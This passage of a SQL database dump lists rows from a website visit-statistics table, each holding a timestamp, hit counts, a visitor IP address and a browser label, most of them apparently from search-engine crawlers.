,1,1,0,0,'157.55.39.171','other'),(419507,1557614449,1,1,0,0,'5.45.207.79','other'),(419508,1557614450,1,1,0,0,'141.8.142.103','other'),(419509,1557614513,3,3,0,0,'104.154.133.241','chrome'),(419510,1557614565,3,3,0,0,'35.232.237.214','chrome'),(419511,1557614585,3,3,0,0,'35.232.111.84','chrome'),(419512,1557614609,3,3,0,0,'35.224.166.166','chrome'),(419513,1557614622,2,2,0,0,'35.225.17.21','chrome'),(419515,1557614635,3,3,0,0,'35.239.218.192','chrome'),(419516,1557614871,1,1,0,0,'178.154.244.49','other'),(419517,1557615075,2,2,0,0,'66.249.65.214','chrome'),(419518,1557616890,1,1,0,0,'95.163.255.94','other'),(419519,1557616970,1,1,0,0,'40.77.167.58','other'),(419520,1557617391,1,1,0,0,'66.249.65.212','chrome'),(419521,1557618263,1,1,0,0,'8.29.198.27','other'),(419522,1557618332,1,1,0,0,'8.29.198.25','other'),(419523,1557618574,1,1,0,0,'207.46.13.243','other'),(419524,1557618654,1,1,0,0,'157.55.39.171','other'),(419525,1557619291,1,1,0,0,'66.249.73.5','chrome'),(419526,1557619450,1,1,0,0,'5.45.207.79','other'),(419527,1557619633,2,2,0,0,'178.154.244.11','other'),(419528,1557619895,1,1,0,0,'66.249.65.212','chrome'),(419529,1557620044,1,1,0,0,'5.45.207.19','other'),(419530,1557620556,1,1,0,0,'5.45.207.79','other'),(419531,1557620717,1,1,0,0,'66.249.65.216','chrome'),(419532,1557621020,1,1,0,0,'5.164.150.28','chrome'),(419533,1557621277,1,1,0,0,'157.55.39.237','other'),(419534,1557621592,1,1,0,0,'5.45.207.79','other'),(419535,1557621672,1,1,0,0,'207.46.13.155','other'),(419536,1557622011,2,2,0,0,'141.8.142.103','other'),(419537,1557622179,1,1,0,0,'66.249.65.212','chrome'),(419538,1557622787,1,1,0,0,'95.163.255.93','other'),(419539,1557623038,1,1,0,0,'87.250.224.81','other'),(419540,1557623090,1,1,0,0,'207.46.13.155','other'),(419541,1557623473,2,2,0,0,'157.55.39.237','other'),(419542,1557623905,1,1,0,0,'95.163.255.96','other'),(419543,1557624147,1,1,0,0,'66.249.73.7','chrome'),(419544,1557624297,1,1,0,0,'141.8.142.108','other'),(419545,1557624301,1,1,0,0,'95.108.181.75','other'),(419546,1557624482,1,1,0,0,'87.250.224.65','other'),(419547,1557625339,1,1,0,0,'157.55.39.3','other'),(419548,1557625956,1,1,0,0,'66.249.65.214','chrome'),(419549,1557626614,1,1,0,0,'66.249.73.9','chrome'),(419550,1557627932,1,1,0,0,'40.77.167.152','other'),(419551,1557628164,1,1,0,0,'40.77.167.3','other'),(419552,1557628827,1,1,0,0,'66.249.65.214','chrome'),(419553,1557629143,2,2,0,0,'8.29.198.27','other'),(419554,1557629590,1,1,0,0,'157.55.39.115','other'),(419555,1557629607,2,2,0,0,'207.46.13.199','other'),(419556,1557631416,1,1,0,0,'207.46.13.199','other'),(419557,1557632899,1,1,0,0,'5.255.253.38','other'),(419558,1557632968,1,1,0,0,'87.250.224.118','other'),(419559,1557633498,1,1,0,0,'207.46.13.199','other'),(419560,1557633588,1,1,0,0,'66.249.73.9','chrome'),(419561,1557634513,1,1,0,0,'207.46.13.186','other'),(419562,1557634546,1,1,0,0,'207.46.13.36','other'),(419563,1557634826,1,1,0,0,'66.249.65.212','chrome'),(419564,1557635643,1,1,0,0,'54.71.236.50','other'),(419565,1557635648,1,1,0,0,'66.249.65.216','chrome'),(419566,1557636990,1,1,0,0,'95.163.255.97','other'),(419567,1557637001,1,1,0,0,'95.163.255.187','other'),(419568,1557639225,1,1,0,0,'207.46.13.203','other'),(419569,1557640025,2,2,0,0,'8.29.198.25','other'),(419570,1557640859,1,1,0,0,'95.163.255.190','other'),(419571,1557641105,1,1,0,0,'178.154.171.30','other'),(419572,1557641165,2,2,0,0,'207.46.13.199','other'),(419573,1557641258,1,1,0,0,'141.8.142.103','other'),(419574,1557641340,2,2,0,0,'141.8.132.16','other'),(419575,1557641556,1,1,0,0,'178.154.200.48','other'),(419576,1557642273,1,1,0,0,'66.249.73.9','chrome'),(419577,1557642473,2,2,0,0,'52.41.3.24','chrome'),(419578,1557643167,1,1,0,0,'66.249.73.7','chrome'),(419579,1557645454,21,21,0,0,'34.234.54.252','chrome'),(419580,1557645457,1,1,0,0,'34.234.54.252','other'),(419581,1557645554,1,1,0,0,'178.154.244.11','other'),(419582,1557645612,1,1,0,0,'87.250.224.81','other'),(419583,1557645770,1,1,0,0,'141.8.142.162','other'),(419584,1557645873,1,1,0,0,'141.8.142.191','other'),(419585,1557645946,1,1,0,0,'95.108.181.83','other'),(419586,1557645949,1,1,0,0,'141.8.142.65','other'),(419587,1557646072,1,1,0,0,'178.154.171.27','other'),(419588,1557646462,1,1,0,0,'207.46.13.40','other'),(419589,1557647048,1,1,0,0,'95.163.255.99','other'),(419590,1557648819,1,1,0,0,'95.163.255.160','other'),(419591,1557648936,1,1,0,0,'66.249.73.5','chrome'),(419592,1557649831,1,1,0,0,'178.154.244.49','other'),(419593,1557649842,1,1,0,0,'141.8.142.65','other'),(419594,1557649875,1,1,0,0,'5.255.253.22','other'),(419595,1557649902,1,1,0,0,'95.108.213.50','other'),(419596,1557650109,1,1,0,0,'95.108.181.54','other'),(419597,1557650157,1,1,0,0,'66.249.65.214','chrome'),(419598,1557650228,1,1,0,0,'66.249.65.216','chrome'),(419599,1557650551,1,1,0,0,'37.9.113.20','other'),(419600,1557650928,2,2,0,0,'8.29.198.25','other'),(419601,1557651786,1,1,0,0,'5.45.207.76','other'),(419602,1557651888,1,1,0,0,'66.249.65.214','chrome'),(419603,1557653197,1,1,0,0,'207.46.13.141','other'),(419604,1557653784,1,1,0,0,'40.77.167.145','other'),(419605,1557654139,1,1,0,0,'66.249.65.214','chrome'),(419606,1557654167,1,1,0,0,'5.255.253.25','other'),(419607,1557654505,1,1,0,0,'141.8.142.162','other'),(419608,1557654863,1,1,0,0,'5.45.207.19','other'),(419609,1557654943,1,1,0,0,'141.8.142.65','other'),(419610,1557655106,1,1,0,0,'109.74.154.72','chrome'),(419611,1557655219,1,1,0,0,'207.46.13.233','other'),(419612,1557656095,1,1,0,0,'66.249.65.214','chrome'),(419613,1557656993,1,1,0,0,'40.77.167.156','other'),(419614,1557657313,1,1,0,0,'207.46.13.233','other'),(419615,1557657768,3,3,0,0,'35.239.36.198','chrome'),(419616,1557657853,3,3,0,0,'35.225.252.16','chrome'),(419617,1557657893,3,3,0,0,'34.66.237.204','chrome'),(419618,1557657919,3,3,0,0,'35.232.129.71','chrome'),(419619,1557657933,3,3,0,0,'35.232.107.8','chrome'),(419620,1557657949,3,3,0,0,'35.226.250.109','chrome'),(419621,1557658075,1,1,0,0,'66.249.73.5','chrome'),(419622,1557658507,1,1,0,0,'58.250.125.91','other'),(419623,1557658571,1,1,0,0,'66.249.65.216','chrome'),(419624,1557658884,1,1,0,0,'178.154.244.11','other'),(419625,1557658936,2,2,0,0,'95.108.181.54','other'),(419626,1557659311,1,1,0,0,'178.154.200.48','other'),(419627,1557659340,2,2,0,0,'40.77.167.156','other'),(419628,1557661820,2,2,0,0,'8.29.198.25','other'),(419629,1557662118,1,1,0,0,'66.249.65.212','chrome'),(419630,1557662270,1,1,0,0,'40.77.167.156','other'),(419631,1557663309,1,1,0,0,'37.9.113.38','other'),(419632,1557664287,1,1,0,0,'178.154.244.65','other'),(419633,1557664977,1,1,0,0,'66.249.65.214','chrome'),(419634,1557665012,1,1,0,0,'66.249.73.7','chrome'),(419635,1557665089,2,2,0,0,'40.77.167.145','other'),(419636,1557665673,1,1,0,0,'66.249.73.9','chrome'),(419637,1557666239,1,1,0,0,'213.180.203.9','other'),(419638,1557666296,1,1,0,0,'5.45.207.80','other'),(419639,1557666373,1,1,0,0,'40.77.167.145','other'),(419640,1557667524,1,1,0,0,'104.148.64.26','chrome'),(419641,1557668027,1,1,0,0,'91.196.178.165','chrome'),(419642,1557668251,1,1,0,0,'207.46.13.13','other'),(419643,1557668297,1,1,0,0,'66.249.73.5','chrome'),(419644,1557668587,1,1,0,0,'40.77.167.145','other'),(419645,1557668627,1,1,0,0,'66.249.65.214','chrome'),(419646,1557669568,2,2,0,0,'207.46.13.84','other'),(419647,1557669835,2,2,0,0,'66.249.65.216','chrome'),(419648,1557670502,1,1,0,0,'66.249.73.5','chrome'),(419649,1557671232,1,1,0,0,'157.55.39.190','other'),(419650,1557672734,1,1,0,0,'66.249.65.212','chrome'),(419651,1557672740,2,2,0,0,'8.29.198.25','other'),(419652,1557672745,2,2,0,0,'40.77.167.156','other'),(419653,1557672768,1,1,0,0,'213.180.203.23','other'),(419654,1557672829,1,1,0,0,'178.154.171.30','other'),(419655,1557672984,1,1,0,0,'157.55.39.190','other'),(419656,1557672995,1,1,0,0,'178.154.200.8','other'),(419657,1557673038,1,1,0,0,'213.180.203.48','other'),(419658,1557673527,1,1,0,0,'66.249.65.216','chrome'),(419659,1557675840,1,1,0,0,'66.249.65.214','chrome'),(419660,1557676051,1,1,0,0,'178.154.171.17','other'),(419661,1557676135,3,3,0,0,'66.249.65.212','chrome'),(419662,1557676151,1,1,0,0,'87.250.224.81','other'),(419663,1557676979,1,1,0,0,'157.55.39.53','other'),(419664,1557677434,1,1,0,0,'66.249.73.9','chrome'),(419665,1557678243,1,1,0,0,'157.55.39.53','other'),(419666,1557678531,2,2,0,0,'66.249.65.212','chrome'),(419667,1557678784,2,2,0,0,'66.249.65.216','chrome'),(419668,1557679046,1,1,0,0,'5.255.253.25','other'),(419669,1557679133,1,1,0,0,'5.255.253.16','other'),(419670,1557679328,1,1,0,0,'87.250.224.99','other'),(419671,1557679784,1,1,0,0,'40.77.167.174','other'),(419672,1557681050,1,1,0,0,'66.249.65.212','chrome'),(419673,1557681201,1,1,0,0,'66.249.65.214','chrome'),(419674,1557682231,1,1,0,0,'46.211.131.229','chrome'),(419675,1557682393,3,3,0,0,'40.77.167.54','other'),(419676,1557682690,1,1,0,0,'5.45.207.79','other'),(419677,1557682698,1,1,0,0,'95.108.213.4','other'),(419678,1557682865,1,1,0,0,'178.154.244.11','other'),(419679,1557682992,2,2,0,0,'40.77.167.25','other'),(419680,1557683627,2,2,0,0,'8.29.198.26','other'),(419681,1557683746,1,1,0,0,'207.46.13.7','other'),(419682,1557684115,1,1,0,0,'91.196.178.164','chrome'),(419683,1557684656,1,1,0,0,'92.113.127.241','chrome'),(419684,1557685093,1,1,0,0,'40.77.167.54','other'),(419685,1557686444,2,2,0,0,'66.249.65.216','chrome'),(419686,1557686501,1,1,0,0,'40.77.167.54','other'),(419687,1557686620,1,1,0,0,'87.250.224.47','other'),(419688,1557686690,1,1,0,0,'178.154.244.11','other'),(419689,1557687238,1,1,0,0,'5.45.207.79','other'),(419690,1557687448,1,1,0,0,'66.249.65.214','chrome'),(419691,1557687713,2,2,0,0,'178.154.244.11','other'),(419692,1557687764,1,1,0,0,'207.46.13.7','other'),(419693,1557688391,1,1,0,0,'40.77.167.25','other'),(419694,1557689232,1,1,0,0,'5.45.207.79','other'),(419695,1557690979,1,1,0,0,'66.249.66.218','chrome'),(419696,1557691178,1,1,0,0,'31.43.107.230','chrome'),(419697,1557691720,1,1,0,0,'66.249.66.128','chrome'),(419698,1557691942,1,1,0,0,'66.249.66.220','chrome'),(419699,1557691959,1,1,0,0,'157.55.39.189','other'),(419700,1557692813,1,1,0,0,'66.249.66.128','chrome'),(419701,1557693967,1,1,0,0,'66.249.66.218','chrome'),(419702,1557694528,1,1,0,0,'8.29.198.26','other'),(419703,1557694597,2,2,0,0,'207.46.13.7','other'),(419704,1557694646,1,1,0,0,'8.29.198.25','other'),(419705,1557695069,1,1,0,0,'66.249.66.222','chrome'),(419706,1557695366,1,1,0,0,'157.55.39.162','other'),(419707,1557695843,1,1,0,0,'66.249.66.218','chrome'),(419708,1557696007,1,1,0,0,'207.46.13.7','other'),(419709,1557697528,1,1,0,0,'87.250.224.81','other'),(419710,1557697698,1,1,0,0,'213.180.203.53','other'),(419711,1557697792,1,1,0,0,'5.45.207.79','other'),(419712,1557697796,1,1,0,0,'141.8.142.103','other'),(419713,1557698122,1,1,0,0,'66.249.66.130','chrome'),(419714,1557698849,1,1,0,0,'157.55.39.75','other'),(419715,1557699006,1,1,0,0,'66.249.66.222','chrome'),(419716,1557699200,1,1,0,0,'66.249.66.218','chrome'),(419717,1557700190,1,1,0,0,'66.249.66.220','chrome'),(419718,1557700233,2,2,0,0,'66.249.66.130','chrome'),(419719,1557700400,1,1,0,0,'66.249.66.128','chrome'),(419720,1557700870,2,2,0,0,'207.46.13.171','other'),(419721,1557700970,1,1,0,0,'141.8.142.38','other'),(419722,1557701058,3,3,0,0,'130.211.235.74','chrome'),(419723,1557701129,2,2,0,0,'34.66.243.133','chrome'),(419725,1557701154,3,3,0,0,'35.225.254.105','chrome'),(419726,1557701176,3,3,0,0,'35.225.253.185','chrome'),(419727,1557701194,3,3,0,0,'130.211.230.81','chrome'),(419728,1557701215,3,3,0,0,'35.225.63.20','chrome'),(419729,1557701272,1,1,0,0,'5.45.207.19','other'),(419730,1557701707,1,1,0,0,'66.249.66.222','chrome'),(419731,1557701726,1,1,0,0,'178.154.244.11','other'),(419732,1557701858,1,1,0,0,'207.46.13.168','other'),(419733,1557702486,1,1,0,0,'207.46.13.171','other'),(419734,1557702571,1,1,0,0,'40.77.167.15','other'),(419735,1557702750,1,1,0,0,'157.55.39.170','other'),(419736,1557703635,1,1,0,0,'5.45.207.79','other'),(419737,1557704464,2,2,0,0,'40.77.167.161','other'),(419738,1557705409,2,2,0,0,'8.29.198.27','other'),(419739,1557705770,1,1,0,0,'207.46.13.168','other'),(419740,1557706720,1,1,0,0,'40.77.167.59','other'),(419741,1557707114,1,1,0,0,'207.46.13.167','other'),(419742,1557707424,1,1,0,0,'207.46.13.10','other'),(419743,1557707753,2,2,0,0,'157.55.39.253','other'),(419744,1557708189,1,1,0,0,'40.77.167.59','other'),(419745,1557708439,1,1,0,0,'178.154.171.17','other'),(419746,1557709214,1,1,0,0,'66.249.66.222','chrome'),(419747,1557709605,1,1,0,0,'157.55.39.253','other'),(419748,1557710239,1,1,0,0,'66.249.66.130','chrome'),(419749,1557711545,1,1,0,0,'178.154.171.69','other'),(419750,1557711961,1,1,0,0,'40.77.167.59','other'),(419751,1557712018,1,1,0,0,'141.8.132.16','other'),(419752,1557712093,1,1,0,0,'66.249.66.220','chrome'),(419753,1557713612,1,1,0,0,'157.55.39.253','other'),(419754,1557714916,1,1,0,0,'207.46.13.36','other'),(419755,1557715389,1,1,0,0,'141.8.142.81','other'),(419756,1557715459,1,1,0,0,'207.46.13.10','other'),(419757,1557715652,2,2,0,0,'34.220.202.161','chrome'),(419758,1557716286,1,1,0,0,'8.29.198.25','other'),(419759,1557716407,1,1,0,0,'8.29.198.26','other'),(419760,1557716590,1,1,0,0,'66.249.66.218','chrome'),(419761,1557718161,1,1,0,0,'141.8.142.65','other'),(419762,1557718226,1,1,0,0,'87.250.224.99','other'),(419763,1557718420,3,3,0,0,'207.46.13.64','other'),(419764,1557719090,1,1,0,0,'37.9.113.20','other'),(419765,1557719170,1,1,0,0,'157.55.39.202','other'),(419766,1557720068,1,1,0,0,'66.249.66.222','chrome'),(419767,1557720200,1,1,0,0,'91.196.178.135','firefox'),(419768,1557720937,1,1,0,0,'207.46.13.126','other'),(419769,1557721015,1,1,0,0,'178.140.108.106','chrome'),(419770,1557721185,1,1,0,0,'66.249.66.132','chrome'),(419771,1557723199,1,1,0,0,'141.8.142.103','other'),(419772,1557723248,1,1,0,0,'213.180.203.48','other'),(419773,1557723427,1,1,0,0,'178.154.171.17','other'),(419774,1557723535,1,1,0,0,'95.108.181.94','other'),(419775,1557723553,2,2,0,0,'178.154.171.27','other'),(419776,1557723776,1,1,0,0,'157.55.39.202','other'),(419777,1557723833,1,1,0,0,'207.46.13.64','other'),(419778,1557724271,1,1,0,0,'66.249.66.220','chrome'),(419779,1557724859,1,1,0,0,'5.45.207.19','other'),(419780,1557725277,1,1,0,0,'37.187.129.166','other'),(419781,1557725345,1,1,0,0,'207.46.13.64','other'),(419782,1557725548,1,1,0,0,'66.249.66.130','chrome'),(419783,1557726156,1,1,0,0,'66.249.66.128','chrome'),(419784,1557727170,1,1,0,0,'8.29.198.27','other'),(419785,1557727262,1,1,0,0,'40.77.167.178','other'),(419786,1557727287,1,1,0,0,'8.29.198.25','other'),(419787,1557727695,1,1,0,0,'87.250.224.107','other'),(419788,1557727747,1,1,0,0,'37.55.187.131','chrome'),(419789,1557727876,1,1,0,0,'213.180.203.53','other'),(419790,1557727904,1,1,0,0,'178.154.171.69','other'),(419791,1557728002,1,1,0,0,'141.8.142.191','other'),(419792,1557728027,1,1,0,0,'87.250.224.99','other'),(419793,1557728283,1,1,0,0,'178.154.171.30','other'),(419794,1557728849,1,1,0,0,'66.249.66.130','chrome'),(419795,1557728960,1,1,0,0,'91.196.178.85','chrome'),(419796,1557729372,1,1,0,0,'207.46.13.64','other'),(419797,1557729432,1,1,0,0,'141.8.132.16','other'),(419798,1557729601,1,1,0,0,'207.46.13.126','other'),(419799,1557729854,1,1,0,0,'40.77.167.207','other'),(419800,1557730772,1,1,0,0,'194.44.108.34','chrome'),(419801,1557731880,1,1,0,0,'40.77.167.207','other'),(419802,1557732915,1,1,0,0,'5.255.253.25','other'),(419803,1557732953,1,1,0,0,'37.9.113.148','other'),(419804,1557733092,1,1,0,0,'213.180.203.9','other'),(419805,1557733343,1,1,0,0,'40.77.167.178','other'),(419806,1557733773,1,1,0,0,'178.154.171.17','other'),(419807,1557733896,1,1,0,0,'193.106.30.98','chrome'),(419808,1557734367,1,1,0,0,'178.154.244.11','other'),(419809,1557735556,1,1,0,0,'207.46.13.112','other'),(419810,1557735630,1,1,0,0,'178.154.171.69','other'),(419811,1557736316,1,1,0,0,'66.249.66.218','chrome'),(419812,1557736370,1,1,0,0,'91.196.178.85','chrome'),(419813,1557736821,1,1,0,0,'157.55.39.9','other'),(419814,1557737109,1,1,0,0,'95.221.182.112','msie'),(419815,1557737200,1,1,0,0,'66.249.66.130','chrome'),(419816,1557737478,1,1,0,0,'37.9.113.20','other'),(419817,1557737682,1,1,0,0,'87.250.224.99','other'),(419818,1557737766,1,1,0,0,'66.249.66.222','chrome'),(419819,1557737769,1,1,0,0,'207.46.13.112','other'),(419820,1557738042,1,1,0,0,'66.249.66.128','chrome'),(419821,1557738064,2,2,0,0,'8.29.198.26','other'),(419822,1557739358,1,1,0,0,'91.196.178.101','chrome'),(419823,1557739443,1,1,0,0,'40.77.167.167','other'),(419824,1557739538,1,1,0,0,'40.77.167.18','other'),(419825,1557740650,1,1,0,0,'178.154.171.17','other'),(419826,1557740652,2,2,0,0,'40.77.167.65','other'),(419827,1557740844,1,1,0,0,'31.43.4.28','chrome'),(419828,1557741137,1,1,0,0,'157.55.39.246','other'),(419829,1557741389,1,1,0,0,'66.249.66.220','chrome'),(419830,1557741765,1,1,0,0,'109.74.154.72','chrome'),(419831,1557742576,1,1,0,0,'5.45.207.79','other'),(419832,1557743128,1,1,0,0,'157.55.39.246','other'),(419833,1557743139,1,1,0,0,'40.77.167.99','other'),(419834,1557743418,2,2,0,0,'66.249.66.132','chrome'),(419835,1557743458,1,1,0,0,'66.249.66.222','chrome'),(419836,1557743615,2,2,0,0,'40.77.167.33','other'),(419837,1557743700,1,1,0,0,'94.100.221.234','chrome'),(419838,1557744281,3,3,0,0,'35.193.236.89','chrome'),(419839,1557744327,3,3,0,0,'104.154.216.127','chrome'),(419840,1557744343,3,3,0,0,'35.222.153.237','chrome'),(419841,1557744358,3,3,0,0,'35.226.232.112','chrome'),(419842,1557744371,3,3,0,0,'34.66.235.174','chrome'),(419843,1557744381,2,2,0,0,'35.225.255.200','chrome'),(419845,1557744533,1,1,0,0,'95.163.255.98','other'),(419846,1557745682,1,1,0,0,'66.249.66.220','chrome'),(419847,1557745710,6,6,0,0,'66.249.66.218','chrome'),(419848,1557746320,1,1,0,0,'5.255.253.25','other'),(419849,1557747244,1,1,0,0,'40.77.167.99','other'),(419850,1557748044,1,1,0,0,'66.249.66.220','chrome'),(419851,1557748341,1,1,0,0,'66.249.66.128','chrome'),(419852,1557748990,1,1,0,0,'8.29.198.27','other'),(419853,1557749070,1,1,0,0,'8.29.198.25','other'),(419854,1557749716,2,2,0,0,'66.249.66.220','chrome'),(419855,1557749764,1,1,0,0,'37.55.28.139','chrome'),(419856,1557749798,1,1,0,0,'91.196.178.85','chrome'),(419857,1557750028,1,1,0,0,'40.77.167.99','other'),(419858,1557750407,1,1,0,0,'91.124.242.45','firefox'),(419859,1557750469,2,2,0,0,'66.249.66.130','chrome'),(419860,1557750496,1,1,0,0,'194.44.16.53','chrome'),(419861,1557750527,1,1,0,0,'95.163.255.96','other'),(419862,1557750675,1,1,0,0,'91.227.206.120','chrome'),(419863,1557751008,1,1,0,0,'95.163.255.161','other'),(419864,1557751201,1,1,0,0,'66.249.66.220','chrome'),(419865,1557751594,1,1,0,0,'213.180.203.23','other'),(419866,1557751781,9,9,0,0,'198.204.244.90','other'),(419867,1557751923,1,1,0,0,'40.77.167.33','other'),(419868,1557752000,145,145,0,0,'148.251.10.183','other'),(419869,1557752065,1,1,0,0,'87.250.224.81','other'),(419870,1557752482,1,1,0,0,'94.100.221.234','chrome'),(419871,1557752871,1,1,0,0,'95.163.255.178','other'),(419872,1557752904,69,69,0,0,'148.251.10.183','other'),(419873,1557752942,1,1,0,0,'66.249.66.222','chrome'),(419874,1557752971,1,1,0,0,'66.249.66.220','chrome'),(419875,1557753695,1,1,0,0,'66.249.66.132','chrome'),(419876,1557754097,1,1,0,0,'46.160.125.74','firefox'),(419877,1557754797,1,1,0,0,'66.249.66.222','chrome'),(419878,1557755357,1,1,0,0,'157.55.39.68','other'),(419879,1557755994,1,1,0,0,'87.250.224.65','other'),(419880,1557756064,2,2,0,0,'178.154.244.11','other'),(419881,1557756146,1,1,0,0,'141.8.142.103','other'),(419882,1557756581,1,1,0,0,'157.55.39.238','other'),(419883,1557756589,1,1,0,0,'66.249.66.132','chrome'),(419884,1557756785,1,1,0,0,'82.207.46.16','chrome'),(419885,1557756935,1,1,0,0,'31.13.127.37','other'),(419886,1557757058,1,1,0,0,'157.55.39.73','other'),(419887,1557757258,2,2,0,0,'66.249.66.128','chrome'),(419888,1557758092,2,2,0,0,'66.249.66.222','chrome'),(419889,1557758192,1,1,0,0,'157.55.39.238','other'),(419890,1557758480,1,1,0,0,'66.249.66.128','chrome'),(419891,1557758517,1,1,0,0,'95.163.255.192','other'),(419892,1557758884,1,1,0,0,'95.108.213.4','other'),(419893,1557758942,1,1,0,0,'66.249.66.220','chrome'),(419894,1557759087,1,1,0,0,'207.244.157.10','other'),(419895,1557759114,1,1,0,0,'66.249.66.222','chrome'),(419896,1557759505,2,2,0,0,'207.46.13.110','other'),(419897,1557759899,2,2,0,0,'8.29.198.25','other'),(419898,1557760186,21,21,0,0,'78.46.99.254','other'),(419899,1557760739,1,1,0,0,'207.46.13.110','other'),(419900,1557760874,1,1,0,0,'66.249.66.218','chrome'),(419901,1557761616,1,1,0,0,'91.209.11.236','other'),(419902,1557761818,1,1,0,0,'95.163.255.93','other'),(419903,1557761869,1,1,0,0,'95.163.255.95','other'),(419904,1557761965,1,1,0,0,'66.249.66.130','chrome'),(419905,1557762126,1,1,0,0,'40.77.167.118','other'),(419906,1557762947,1,1,0,0,'95.163.255.97','other'),(419907,1557763558,1,1,0,0,'157.55.39.73','other'),(419908,1557764096,1,1,0,0,'141.8.142.191','other'),(419909,1557764167,1,1,0,0,'178.154.171.17','other'),(419910,1557764187,1,1,0,0,'141.8.142.65','other'),(419911,1557764548,1,1,0,0,'95.108.181.83','other'),(419912,1557764707,1,1,0,0,'95.108.213.4','other'),(419913,1557765053,1,1,0,0,'66.249.66.132','chrome'),(419914,1557765863,1,1,0,0,'95.108.181.83','other'),(419915,1557765878,1,1,0,0,'141.8.142.65','other'),(419916,1557766578,1,1,0,0,'66.249.66.222','chrome'),(419917,1557767066,1,1,0,0,'40.77.167.23','other'),(419918,1557768139,1,1,0,0,'95.163.255.167','other'),(419919,1557768564,1,1,0,0,'5.45.207.19','other'),(419920,1557768640,1,1,0,0,'178.154.244.11','other'),(419921,1557768751,2,2,0,0,'207.46.13.110','other'),(419922,1557768805,1,1,0,0,'66.249.66.218','chrome'),(419923,1557769387,2,2,0,0,'66.249.66.220','chrome'),(419924,1557769969,1,1,0,0,'141.8.142.103','other'),(419925,1557770792,1,1,0,0,'8.29.198.27','other'),(419926,1557770879,1,1,0,0,'8.29.198.26','other'),(419927,1557771358,2,2,0,0,'66.249.66.222','chrome'),(419928,1557771560,4,4,0,0,'157.55.39.73','other'),(419929,1557771657,1,1,0,0,'176.100.3.84','firefox'),(419930,1557771839,1,1,0,0,'66.249.66.220','chrome'),(419931,1557771875,1,1,0,0,'37.9.113.103','other'),(419932,1557772442,4,4,0,0,'40.77.167.23','other'),(419933,1557772450,3,3,0,0,'157.55.39.190','other'),(419934,1557772454,6,6,0,0,'207.46.13.87','other'),(419935,1557773482,1,1,0,0,'40.77.167.23','other'),(419936,1557773525,1,1,0,0,'104.148.64.26','chrome'),(419937,1557773597,1,1,0,0,'66.249.66.218','chrome'),(419938,1557773603,1,1,0,0,'66.249.66.220','chrome'),(419939,1557773743,1,1,0,0,'46.96.39.171','chrome'),(419940,1557774181,1,1,0,0,'89.252.21.52','other'),(419941,1557774267,1,1,0,0,'207.46.13.87','other'),(419942,1557774531,1,1,0,0,'66.249.66.130','chrome'),(419943,1557775030,1,1,0,0,'95.163.255.156','other'),(419944,1557776209,2,2,0,0,'95.213.141.126','opera'),(419945,1557776298,1,1,0,0,'193.106.30.98','chrome'),(419946,1557776369,1,1,0,0,'213.180.203.61','other'),(419947,1557777098,1,1,0,0,'46.211.41.193','chrome'),(419948,1557777241,1,1,0,0,'66.249.66.218','chrome'),(419949,1557777395,1,1,0,0,'66.249.66.132','chrome'),(419950,1557778662,1,1,0,0,'213.180.203.23','other'),(419951,1557778735,1,1,0,0,'157.55.39.190','other'),(419952,1557778921,1,1,0,0,'207.46.13.70','other'),(419953,1557778996,1,1,0,0,'66.249.66.222','chrome'),(419954,1557779781,1,1,0,0,'95.108.213.50','other'),(419955,1557779808,1,1,0,0,'66.249.66.220','chrome'),(419956,1557779877,1,1,0,0,'87.250.224.99','other'),(419957,1557780030,1,1,0,0,'95.163.255.99','other'),(419958,1557780539,1,1,0,0,'95.108.181.54','other'),(419959,1557780647,1,1,0,0,'66.249.66.218','chrome'),(419960,1557781688,1,1,0,0,'8.29.198.25','other'),(419961,1557781773,1,1,0,0,'8.29.198.26','other'),(419962,1557782187,1,1,0,0,'95.163.255.168','other'),(419963,1557782435,1,1,0,0,'66.249.66.128','chrome'),(419964,1557783417,1,1,0,0,'66.249.66.218','chrome'),(419965,1557783568,2,2,0,0,'66.249.66.222','chrome'),(419966,1557783640,1,1,0,0,'95.108.181.83','other'),(419967,1557783714,1,1,0,0,'5.255.253.25','other'),(419968,1557783783,1,1,0,0,'141.8.132.16','other'),(419969,1557784064,1,1,0,0,'141.8.142.65','other'),(419970,1557784207,1,1,0,0,'87.250.224.47','other'),(419971,1557784792,2,2,0,0,'40.77.167.75','other'),(419972,1557785672,1,1,0,0,'40.77.167.64','other'),(419973,1557786166,1,1,0,0,'40.77.167.174','other'),(419974,1557787581,2,2,0,0,'66.249.66.218','chrome'),(419975,1557787699,1,1,0,0,'93.158.166.7','other'),(419976,1557788125,1,1,0,0,'66.249.66.132','chrome'),(419977,1557789339,2,2,0,0,'157.55.39.186','other'),(419978,1557790173,1,1,0,0,'91.209.11.236','other'),(419979,1557790509,1,1,0,0,'66.249.66.220','chrome'),(419980,1557790513,2,2,0,0,'40.77.167.64','other'),(419981,1557790671,1,1,0,0,'95.163.255.92','other'),(419982,1557790929,1,1,0,0,'207.46.13.12','other'),(419983,1557790971,1,1,0,0,'178.154.200.8','other'),(419984,1557791659,1,1,0,0,'37.9.113.38','other'),(419985,1557791691,1,1,0,0,'141.8.183.11','other'),(419986,1557792135,1,1,0,0,'87.250.224.99','other'),(419987,1557792395,1,1,0,0,'87.250.224.118','other'),(419988,1557792576,1,1,0,0,'8.29.198.27','other'),(419989,1557792637,1,1,0,0,'8.29.198.25','other'),(419990,1557792967,1,1,0,0,'37.9.113.38','other'),(419991,1557793002,1,1,0,0,'213.180.203.53','other'),(419992,1557793818,1,1,0,0,'95.163.255.192','other'),(419993,1557794309,1,1,0,0,'207.46.13.12','other'),(419994,1557794973,1,1,0,0,'66.249.66.218','chrome'),(419995,1557796457,1,1,0,0,'207.46.13.148','other'),(419996,1557797604,1,1,0,0,'66.249.66.218','chrome'),(419997,1557798098,1,1,0,0,'207.46.13.21','other'),(419998,1557798153,1,1,0,0,'66.249.66.132','chrome'),(419999,1557799221,1,1,0,0,'95.108.181.83','other'),(420000,1557799225,1,1,0,0,'5.255.253.25','other'),(420001,1557799364,2,2,0,0,'37.9.113.103','other'),(420002,1557799410,1,1,0,0,'193.106.30.98','chrome'),(420003,1557799461,1,1,0,0,'141.8.142.103','other'),(420004,1557799489,1,1,0,0,'5.255.253.16','other'),(420005,1557800803,1,1,0,0,'95.67.87.191','firefox'),(420006,1557801044,2,2,0,0,'40.77.167.137','other'),(420007,1557801448,1,1,0,0,'207.46.13.21','other'),(420008,1557802390,1,1,0,0,'13.66.139.0','other'),(420009,1557802613,1,1,0,0,'91.196.178.67','chrome'),(420010,1557803080,1,1,0,0,'141.8.132.16','other'),(420011,1557803152,1,1,0,0,'213.180.203.61','other'),(420012,1557803167,1,1,0,0,'87.250.224.47','other'),(420013,1557803170,1,1,0,0,'95.108.181.94','other'),(420014,15578032